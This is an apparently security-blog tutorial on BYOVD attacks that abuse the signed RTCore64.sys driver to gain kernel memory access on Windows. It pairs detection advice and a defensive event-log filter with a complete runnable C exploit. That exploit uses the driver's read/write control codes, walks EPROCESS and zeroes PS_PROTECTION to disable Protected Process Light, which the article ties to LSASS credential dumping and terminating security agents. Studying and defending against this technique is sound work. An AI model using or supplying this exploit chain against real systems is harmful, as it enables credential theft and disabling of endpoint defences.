Exploiting Vulnerable Windows Drivers: A Deep Dive into BYOVD Techniques

Introduction

Bring Your Own Vulnerable Driver (BYOVD) is a technique in which an attacker who already holds local administrator rights loads a legitimately signed but vulnerable third-party driver and abuses its flawed IOCTL interface to read and write arbitrary kernel memory. Because the driver carries a valid signature, Driver Signature Enforcement lets it load, and the attacker gets kernel-level control without needing a kernel exploit of their own. This article walks through the technique with `RTCore64.sys` (the MSI Afterburner driver, a frequent choice in real intrusions), shows how the resulting primitives are used to locate EPROCESS structures and strip process protections, and notes the detection and mitigation options at each step.

Learning Objectives

  • Understand how BYOVD attacks leverage vulnerable drivers for kernel exploitation.
  • Learn to identify and interact with exploitable drivers using IOCTL commands.
  • Explore defensive strategies to mitigate such attacks.

1. Loading a Vulnerable Driver in a Lab Environment

Before exploitation, the attacker registers the driver as a kernel service and starts it. This requires administrator rights (SeLoadDriverPrivilege), which is why BYOVD is an escalation from admin to kernel, not from user to admin. The command below uses sc.exe, the Service Control Manager client; it works from cmd or PowerShell, but in PowerShell the `.exe` suffix is mandatory because `sc` alone resolves to the Set-Content alias:

sc.exe create RTCore64 binPath= "C:\path\to\RTCore64.sys" type= kernel start= demand

Step-by-Step Explanation:

1. `sc.exe create RTCore64` – Registers a new service named RTCore64 with the Service Control Manager. The name is arbitrary; attackers usually pick something innocuous.

2. `binPath=` – Path to the driver image. Note the space after every `=`: sc.exe's argument parser requires it.

3. `type= kernel` – Registers the service as a kernel-mode driver (SERVICE_KERNEL_DRIVER).

4. `start= demand` – Sets the start type to on-demand (SERVICE_DEMAND_START). This only registers the driver; it is actually loaded when the service is started with sc.exe start RTCore64, and the device object \\.\RTCore64 exists from that point on.

Security Consideration:

  • Service installation is written to the System log as Event ID 7045 ("A service was installed in the system", source Service Control Manager). For a driver the event records Service Type "kernel mode driver" and the image path; a kernel driver whose image lives outside \SystemRoot\System32\drivers (a user profile, Temp, ProgramData) is a strong signal.
  • With Sysmon deployed, Event ID 6 (Driver loaded) adds the image hash and signature details, so the load can be matched against known-vulnerable driver hashes even when the file has been renamed.
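The following is an added example, not code from the original article: a small triage filter for Event ID 7045 messages implementing the two checks above. It is written in C to match the rest of the page's code. The parser follows the real 7045 message layout (Service Name / Service File Name / Service Type / Service Start Type); the deny list of abused driver names is illustrative (a production rule would match Microsoft's blocklist hashes), and the three sample events at the bottom are constructed for this example.

```c
/* Added example, not from the original article: triage filter for System log
 * Event ID 7045 ("A service was installed in the system"). Flags (a) kernel-mode
 * drivers installed from outside System32\drivers and (b) image names on a small
 * deny list of drivers publicly known to be abused for BYOVD. The deny list is
 * illustrative and the sample events below are constructed. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FLAG_OUTSIDE_DRIVERS_DIR 1   /* kernel driver image not under system32\drivers */
#define FLAG_KNOWN_ABUSED        2   /* image name on the deny list */

static const char *ABUSED_DRIVERS[] = { "rtcore64.sys", NULL };   /* illustrative deny list */

/* Copy the rest of the line after `key` into out, lower-cased; returns 0 if the key is absent. */
static int field(const char *msg, const char *key, char *out, size_t outlen) {
    const char *p = strstr(msg, key);
    if (!p) return 0;
    p += strlen(key);
    while (*p == ' ' || *p == '\t') p++;
    size_t n = 0;
    for (; p[n] && p[n] != '\r' && p[n] != '\n' && n + 1 < outlen; n++)
        out[n] = (char)tolower((unsigned char)p[n]);
    out[n] = '\0';
    return 1;
}

/* Returns a bitmask of FLAG_* values; 0 means nothing suspicious or not a driver install. */
int triage_7045(const char *msg) {
    char type[64], path[512];
    int flags = 0;
    if (!field(msg, "Service Type:", type, sizeof type) ||
        !field(msg, "Service File Name:", path, sizeof path)) return 0;
    if (strstr(type, "kernel mode driver") == NULL) return 0;   /* user-mode services are out of scope */
    if (strstr(path, "system32\\drivers\\") == NULL) flags |= FLAG_OUTSIDE_DRIVERS_DIR;
    const char *base = strrchr(path, '\\');
    base = base ? base + 1 : path;
    for (int i = 0; ABUSED_DRIVERS[i]; i++)
        if (strcmp(base, ABUSED_DRIVERS[i]) == 0) flags |= FLAG_KNOWN_ABUSED;
    return flags;
}

/* Constructed sample events in the 7045 message format. */
static const char EVENT_BYOVD[] =
    "A service was installed in the system.\r\n\r\n"
    "Service Name:  RTCore64\r\n"
    "Service File Name:  C:\\Users\\Public\\RTCore64.sys\r\n"
    "Service Type:  kernel mode driver\r\n"
    "Service Start Type:  demand start\r\n"
    "Service Account:  \r\n";
static const char EVENT_BENIGN_DRIVER[] =
    "A service was installed in the system.\r\n\r\n"
    "Service Name:  vmhgfs\r\n"
    "Service File Name:  system32\\DRIVERS\\vmhgfs.sys\r\n"
    "Service Type:  kernel mode driver\r\n"
    "Service Start Type:  auto start\r\n"
    "Service Account:  \r\n";
static const char EVENT_USER_SERVICE[] =
    "A service was installed in the system.\r\n\r\n"
    "Service Name:  ExampleSvc\r\n"
    "Service File Name:  C:\\Program Files\\Example\\svc.exe\r\n"
    "Service Type:  user mode service\r\n"
    "Service Start Type:  demand start\r\n"
    "Service Account:  LocalSystem\r\n";

int main(void) {
    const char *names[]  = { "byovd", "benign driver", "user-mode service" };
    const char *events[] = { EVENT_BYOVD, EVENT_BENIGN_DRIVER, EVENT_USER_SERVICE };
    for (int i = 0; i < 3; i++)
        printf("%-18s flags=%d\n", names[i], triage_7045(events[i]));
    return 0;
}
```

The path check is deliberately loose (a substring match on `system32\drivers\`) because the Service File Name field appears in several forms in real events (`\SystemRoot\...`, `\??\C:\...`, or a bare `system32\DRIVERS\...`); the deny-list check is by file name only, so it is a first-pass filter, and the hash from a Sysmon Event ID 6 is what a rule should ultimately key on.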

2. Interacting with the Driver via IOCTL

Once the driver is running, user-mode code opens its device object and sends it IOCTL (I/O control) requests. Each control code selects a handler in the driver's dispatch routine; in a vulnerable driver such as RTCore64.sys those handlers perform the memory operation the caller asks for without checking who is asking or which address is involved. Below is a C++ snippet that opens the device and sends one request:

HANDLE hDevice = CreateFileW(L"\\\\.\\RTCore64", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); // backslashes must be escaped in the string literal
if (hDevice == INVALID_HANDLE_VALUE) return GetLastError(); // driver not loaded, or the device object's ACL refused the open
DWORD bytesReturned = 0; // lpBytesReturned may only be NULL for overlapped I/O
DeviceIoControl(hDevice, 0x80002010, inputBuffer, inputSize, outputBuffer, outputSize, &bytesReturned, NULL);

Breakdown:

– `CreateFile` – Opens a handle to the device object the driver created (`\\.\RTCore64`). In a C string literal each backslash has to be escaped, which is the usual reason this call fails in copied snippets; a failure with ERROR_FILE_NOT_FOUND means the driver is not loaded.
– `DeviceIoControl` – Sends a control code (0x80002010 in this snippet) together with an input and an output buffer. Which code does what is driver-specific and is recovered by reverse-engineering the dispatch routine; the driver reports how many bytes it wrote back through `bytesReturned`.

Mitigation:

  • Block the driver file itself. Microsoft's vulnerable driver blocklist (enforced when memory integrity/HVCI is on, or deployed as a WDAC policy) refuses to load known-bad drivers. Individual IOCTL codes cannot be filtered by signing policy: the driver and its interface are legitimately signed, so the only control point is whether the driver loads at all.

3. Building Kernel Read/Write Primitives

With a handle to the device, the attacker wraps the read and write IOCTLs in small helper functions and from then on treats the driver as an arbitrary kernel memory read/write primitive. Below is a generic sketch of a read helper; the exact request layout (how the address, size and returned value are packed) is driver-specific and must match what the driver's handler expects:

DWORD64 ReadMemory(HANDLE hDriver, DWORD64 address) {
    DWORD64 buffer = 0;
    DWORD bytesReturned = 0; // must not be NULL when lpOverlapped is NULL
    // READ_IOCTL and the in/out layout are driver-specific; RTCore64 takes a
    // structured request (address + size) and returns the value in the same buffer
    if (!DeviceIoControl(hDriver, READ_IOCTL, &address, sizeof(address), &buffer, sizeof(buffer), &bytesReturned, NULL))
        return 0; // treat a failed IOCTL as an unreadable address rather than returning stack garbage
    return buffer;
}

Impact:

  • Arbitrary kernel reads expose every kernel structure: EPROCESS objects (and through them tokens, protection levels and handle tables), the loaded-module list, and the callback arrays that EDR products register for process and thread notifications.

Defense:

  • Kernel Data Protection (KDP), available on Windows 10 version 2004 and later when virtualization-based security is on, lets a driver mark its own data read-only; it does not cover EPROCESS and is not a switch an administrator turns on. The practical control is memory integrity (HVCI) together with the Microsoft vulnerable driver blocklist it enforces, which prevents RTCore64.sys from loading at all.

4. Locating EPROCESS for Privilege Escalation

Every process has an EPROCESS object in kernel memory that holds, among other things, its PID (UniqueProcessId), its primary token and its protection level (Protection). All EPROCESS objects are linked through the ActiveProcessLinks list, so with a read primitive the attacker starts from a known one (the System process, whose address the kernel exports as PsInitialSystemProcess; the kernel base needed to resolve it comes from EnumDeviceDrivers or NtQuerySystemInformation) and walks the list comparing PIDs:

// FindProcessByPID is not defined on this page; in practice it walks the
// EPROCESS.ActiveProcessLinks list with the read primitive (starting from the
// System process, PsInitialSystemProcess) until UniqueProcessId equals pid.
DWORD64 GetEPROCESS(HANDLE hDriver, DWORD pid) {
    DWORD64 targetEprocess = FindProcessByPID(hDriver, pid);
    return targetEprocess; // 0 if no process with that PID exists
}

Exploit Use Case:

  • Clearing the PS_PROTECTION byte of a target EPROCESS to disable Protected Process Light (PPL): either on the attacker's own process so it can open LSASS (which runs as PPL when RunAsPPL is configured) for credential dumping, or on a security product's process so it can be terminated or tampered with.

Detection:

  • The kernel memory reads themselves produce no Windows event, so detection rests on the driver load and on its effects. Microsoft Defender for Endpoint (formerly Windows Defender ATP) records driver loads in the DeviceEvents table (ActionType DriverLoad) with the image hash, which can be matched against the vulnerable driver list; downstream, a PPL process that suddenly accepts full-access opens, or a security agent process exiting without a corresponding stop request, is the behavioural signal.

5. Bypassing Process Protections via PS_PROTECTION

EPROCESS.Protection is a single PS_PROTECTION byte: the protection type in bits 0-2 (none, PPL, full PP), an audit bit, and the signer class (Authenticode, Antimalware, Lsa, Windows, WinTcb, ...) in bits 4-7. The kernel consults it whenever another process tries to open a handle with rights the protection forbids. With a write primitive the attacker simply zeroes the byte, turning a PPL process into an ordinary one:

void DisablePPL(HANDLE hDriver, DWORD64 eprocess) {
    // Offset of EPROCESS.Protection is build-specific (0x87A on Windows 10 20H1-21H2);
    // take it from the kernel symbols (dt nt!_EPROCESS) for the exact target build
    DWORD64 protectionOffset = 0x87A;
    // PS_PROTECTION is one byte (Type, Audit, Signer). WriteMemory is the write-side
    // counterpart of ReadMemory above; it must write exactly one byte here so the
    // neighbouring EPROCESS fields are left intact
    WriteMemory(hDriver, eprocess + protectionOffset, 0x00);
}
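The following added example ties sections 2 through 5 together in one runnable file; it is written for this article and is not code from the original post or from any public tool. It assumes the RTCore64.sys control codes 0x80002048 (read) and 0x8000204C (write) and the 48-byte request layout reported in public analyses of the driver (verify both against your copy), and the Windows 10 20H1-21H2 EPROCESS offsets 0x440 (UniqueProcessId), 0x448 (ActiveProcessLinks) and 0x87A (Protection). On Windows the primitives go through DeviceIoControl; on any other platform, and in the offline test, a `do_ioctl` stand-in plays the vulnerable dispatch routine against a constructed block of "kernel" memory at the made-up address FAKE_BASE, which is what lets the list walk and the PS_PROTECTION overwrite be exercised without a Windows box.

```c
/* Added example, not code from the original article: the RTCore64.sys read/write
 * primitives of sections 2-3 and the EPROCESS walk and PS_PROTECTION overwrite of
 * sections 4-5 in one file. Request layout and control codes follow public analyses
 * of this driver (verify against your copy); EPROCESS offsets are the Windows 10
 * 20H1-21H2 values and are build-specific. On Windows the primitives reach the driver
 * through DeviceIoControl; elsewhere (and in the offline test) do_ioctl() stands in
 * for the vulnerable dispatch routine, copying to or from the requested address with
 * no validation, against a constructed in-memory stand-in for kernel memory. */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define RTCORE64_MEMORY_READ_CODE  0x80002048u
#define RTCORE64_MEMORY_WRITE_CODE 0x8000204Cu
typedef struct {                       /* 48-byte request; the driver moves 4 bytes per call */
    uint8_t pad0[8]; uint64_t address; uint8_t pad1[8];
    uint32_t size;   uint32_t value;   uint8_t pad2[16];
} RTCORE64_MEMORY;
#define OFF_UNIQUE_PROCESS_ID    0x440 /* EPROCESS.UniqueProcessId   (Win10 20H1-21H2) */
#define OFF_ACTIVE_PROCESS_LINKS 0x448 /* EPROCESS.ActiveProcessLinks */
#define OFF_PROTECTION           0x87A /* EPROCESS.Protection, one PS_PROTECTION byte */

#ifdef _WIN32
#include <windows.h>
static int do_ioctl(uint32_t code, RTCORE64_MEMORY *req) {
    static HANDLE h = INVALID_HANDLE_VALUE;          /* opened on first use */
    if (h == INVALID_HANDLE_VALUE)
        h = CreateFileW(L"\\\\.\\RTCore64", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    DWORD ret = 0;
    return h != INVALID_HANDLE_VALUE && DeviceIoControl(h, code, req, sizeof *req, req, sizeof *req, &ret, NULL);
}
#else
#define FAKE_BASE 0xFFFF800000000000ull              /* constructed "kernel" address range */
static uint8_t g_kernel[0x4000];
static int do_ioctl(uint32_t code, RTCORE64_MEMORY *req) {   /* what the flawed handler does */
    if (req->size != 4 || req->address < FAKE_BASE || req->address + 4 > FAKE_BASE + sizeof g_kernel) return 0;
    uint8_t *p = g_kernel + (req->address - FAKE_BASE);
    if (code == RTCORE64_MEMORY_READ_CODE)       memcpy(&req->value, p, 4);
    else if (code == RTCORE64_MEMORY_WRITE_CODE) memcpy(p, &req->value, 4);
    else return 0;
    return 1;
}
#endif

uint32_t kmem_read32(uint64_t addr) {
    RTCORE64_MEMORY req = { .address = addr, .size = 4 };
    return do_ioctl(RTCORE64_MEMORY_READ_CODE, &req) ? req.value : 0;
}
uint64_t kmem_read64(uint64_t addr) {               /* two 4-byte reads, low half first */
    return (uint64_t)kmem_read32(addr) | ((uint64_t)kmem_read32(addr + 4) << 32);
}
uint8_t kmem_read8(uint64_t addr) { return (uint8_t)(kmem_read32(addr & ~3ull) >> ((addr & 3) * 8)); }
int kmem_write32(uint64_t addr, uint32_t value) {
    RTCORE64_MEMORY req = { .address = addr, .size = 4, .value = value };
    return do_ioctl(RTCORE64_MEMORY_WRITE_CODE, &req);
}
/* Read-modify-write of one byte so the EPROCESS fields next to Protection survive. */
int kmem_write8(uint64_t addr, uint8_t value) {
    uint64_t base = addr & ~3ull;
    unsigned shift = (unsigned)(addr & 3) * 8;
    uint32_t word = (kmem_read32(base) & ~(0xFFu << shift)) | ((uint32_t)value << shift);
    return kmem_write32(base, word);
}
/* Walk ActiveProcessLinks from a known EPROCESS (in a real chain the System process,
 * resolved from the kernel's PsInitialSystemProcess export) until the PID matches. */
uint64_t find_eprocess(uint64_t start_eprocess, uint32_t pid) {
    uint64_t ep = start_eprocess;
    do {
        if ((uint32_t)kmem_read64(ep + OFF_UNIQUE_PROCESS_ID) == pid) return ep;
        uint64_t flink = kmem_read64(ep + OFF_ACTIVE_PROCESS_LINKS);
        if (flink == 0) return 0;                    /* read failed: stop instead of spinning */
        ep = flink - OFF_ACTIVE_PROCESS_LINKS;       /* LIST_ENTRY is embedded in the next EPROCESS */
    } while (ep != start_eprocess);
    return 0;
}
/* Zero PS_PROTECTION (Type bits 0-2, Audit bit 3, Signer bits 4-7): the process is no longer PPL. */
int disable_ppl(uint64_t eprocess) { return kmem_write8(eprocess + OFF_PROTECTION, 0); }
#ifndef _WIN32
/* Constructed process list: System (pid 4) -> a PPL process (pid 1234) -> one more (pid 5678) -> System. */
static const uint64_t EP_SYSTEM = FAKE_BASE, EP_PPL = FAKE_BASE + 0x1000, EP_OTHER = FAKE_BASE + 0x2000;
static void put64(uint64_t addr, uint64_t v) { memcpy(g_kernel + (addr - FAKE_BASE), &v, 8); }
void build_fake_kernel(void) {
    const uint64_t eps[3] = { EP_SYSTEM, EP_PPL, EP_OTHER };
    const uint32_t pids[3] = { 4, 1234, 5678 };
    memset(g_kernel, 0, sizeof g_kernel);
    for (int i = 0; i < 3; i++) {
        put64(eps[i] + OFF_UNIQUE_PROCESS_ID, pids[i]);
        put64(eps[i] + OFF_ACTIVE_PROCESS_LINKS, eps[(i + 1) % 3] + OFF_ACTIVE_PROCESS_LINKS); /* Flink */
    }
    g_kernel[EP_PPL - FAKE_BASE + OFF_PROTECTION]     = 0x31; /* Signer=Antimalware(3), Type=ProtectedLight(1) */
    g_kernel[EP_PPL - FAKE_BASE + OFF_PROTECTION - 1] = 0x3C; /* neighbouring byte that must survive the write */
}
int main(void) {                                      /* offline demonstration run */
    build_fake_kernel();
    uint64_t ep = find_eprocess(EP_SYSTEM, 1234);
    printf("pid 1234 -> EPROCESS %" PRIx64 ", Protection %02x", ep, kmem_read8(ep + OFF_PROTECTION));
    printf(" -> %02x after disable_ppl\n", disable_ppl(ep) ? kmem_read8(ep + OFF_PROTECTION) : 0xFFu);
}
#endif
```

Two design points carry over to the real thing. The driver only moves 4 bytes per request, so 64-bit pointers take two reads and a one-byte field such as Protection has to be changed with a read-modify-write of the containing dword, otherwise the adjacent SignatureLevel bytes get clobbered. And the list walk must stop when it returns to its starting point or when a read fails, because a bad offset on a different build will otherwise send it spinning through garbage rather than reporting "not found".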

Mitigation:

  • Use the Microsoft vulnerable driver blocklist, which lists RTCore64.sys among other abused drivers. It is enabled by default since Windows 11 22H2 and on older builds whenever memory integrity (HVCI) is on; it can also be deployed as a standalone WDAC policy. It is a denylist, so drivers not yet on it still load; pair it with a WDAC driver allowlist where the environment allows.

What Undercode Say:

  • Key Takeaway 1: BYOVD attacks rely on outdated but validly signed drivers, so signature checks pass and detection has to come from driver-load telemetry, blocklists and behavioural analysis rather than from the signature.
  • Key Takeaway 2: Once an attacker has arbitrary kernel read/write, every in-kernel protection (PPL, callbacks, tokens) is one write away, so the control has to be keeping the driver from loading: strict driver allowlisting on top of the blocklist.

Analysis:

The rise of BYOVD shows the limit of signing as a trust signal: a signature proves origin, not the absence of bugs, and a driver signed years ago stays loadable until it is explicitly blocked. Microsoft's blocklist removes the well-known offenders, but it is a denylist, so enterprises should add WDAC-based driver allowlisting and keep memory integrity (HVCI) on. Future threats may involve AI-assisted driver fuzzing to discover new vulnerabilities in drivers that are not yet listed.

Prediction:

As EDR products and the blocklist catch up with the well-known drivers, attackers will shift to lesser-known signed drivers with newly discovered flaws (possibly found with automated or AI-assisted fuzzing), so hash- and name-based static detection alone will lag behind. Detection that keys on behaviour (an unexpected kernel driver service install, a PPL process losing its protection, a security agent dying without a stop request) holds up better than any list.

Final Note:

For hands-on training, check out AlteredSecurity’s CETP course, a leading resource for advanced kernel exploitation and EDR bypass techniques.

Reported By: Shivam Yadav – Hackers Feeds